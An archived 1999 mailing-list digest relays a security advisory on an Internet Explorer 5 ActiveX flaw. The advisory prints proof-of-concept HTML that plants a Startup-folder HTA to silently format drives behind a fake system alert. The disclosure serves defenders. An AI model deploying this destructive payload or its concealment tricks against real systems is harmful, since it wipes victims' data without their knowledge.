>Mailing-List: list [EMAIL PROTECTED]; contact >[EMAIL PROTECTED] >Date: 30 Aug 1999 07:00:51 -0000 >Delivered-To: mailing list [EMAIL PROTECTED] >List-Unsubscribe: <mailto:[EMAIL PROTECTED]> >From: [EMAIL PROTECTED] >Reply-to: [EMAIL PROTECTED] >To: [EMAIL PROTECTED] >Subject: [cybercrime-alerts] Digest Number 27 >X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id >DAA20599 > > >--------------------------- ONElist Sponsor ---------------------------- > >ATTENTION ONElist MEMBERS: Get your ONElist news! >Join our MEMBER NEWSLETTER here: ><a href=" http://clickme.onelist.com/ad/newsletter3 ">Click Here</a> > >------------------------------------------------------------------------ >This e-mail via the CYBERCRIME-ALERTS list at http://theMezz.com/alerts >Subscribe: >mailto:[EMAIL PROTECTED] >UnSubscribe: >mailto:[EMAIL PROTECTED] >Free NewsLetter: >http://theMezz.com/news >------------------------------------------------------------------------ > >There is 1 message in this issue. > > Topics in today's digest: > > 1. Internet Explorer code that formats local drives > From: [EMAIL PROTECTED] > > >___________________________________________________________________________ ____ >___________________________________________________________________________ ____ > >Message: 1 > Date: Mon, 30 Aug 1999 02:52:52 -0700 > From: [EMAIL PROTECTED] >Subject: Internet Explorer code that formats local drives > > >The following security advisory is sent to the securiteam mailing list, >and can be found at the >SecuriTeam web site: http://www.securiteam.com > >Internet Explorer code that formats >local drives > >------------------------------------------------------------ > >In a previous article (A flaw in IE 5.0 ActiveX control allows executing >programs) we >explained how hta (HTML application) code in a web page can be used to >attack machines >visiting a certain web site. >We received another dangerous example of this flaw, but in this >demonstration the local hard >drives are formatted, without the user's intervention or knowledge. > >****************************** > >The following was reported to us by Christian Salvarrey: > >Using the following code (note that the code applies for the Spanish >Windows '98. In order >for it to work on an English Windows '98, certain obvious changes should >be applied): > ><object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"> ></object> ><SCRIPT> >scr.Reset(); >scr.Path="C:\\windows\\Men� inicio\\Programas\\Inicio\\automat.hta"; >scr.Doc="<object id='wsh' >classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Ru >n('start >/m format a: /q /autotest /u');alert('IMPORTANT : Windows is configuring >the system. Plase >do not interrupt this process.');</"+"SCRIPT>"; >scr.write(); > >I was able to format my D: drive, and A: drive. (I didn't test it on my >C: drive for obvious >reasons). > >The code does as follows: >1) Using START /m (Spanish Win98 version) the program starts minimized, >so the user can't >see what's going on. >2) Using the undocumented parameter /AUTOTEST, it's possible to run >FORMAT.COM >on any drive automatically (without user intervention) >3) The alert message can say something like "IMPORTANT : Windows is >configuring the >system. Please do not interrupt this process." so the user pays >attention to that first. > >This can be used to hide the fact that the minimized window's title says >FORMAT, which is >the only giveaway in this procedure. > >Obviously, this is a very dangerous flaw, since you can FORMAT, or use >DELTREE in the >C:\MY DOCUMENTS or C:\WINDOWS folders to erase them also. > > >___________________________________________________________________________ ____ >___________________________________________________________________________ ____ ------- AFLHI 058009990407128029/089802 milis ini didukung oleh : >> http://www.indolinux.com - dunia linux indonesia ------------------------------------------------------------------- untuk berhenti kirim email ke [EMAIL PROTECTED] untuk melihat peraturan kirim email ke [EMAIL PROTECTED] arsip berada di http://www.mail-archive.com/[email protected]
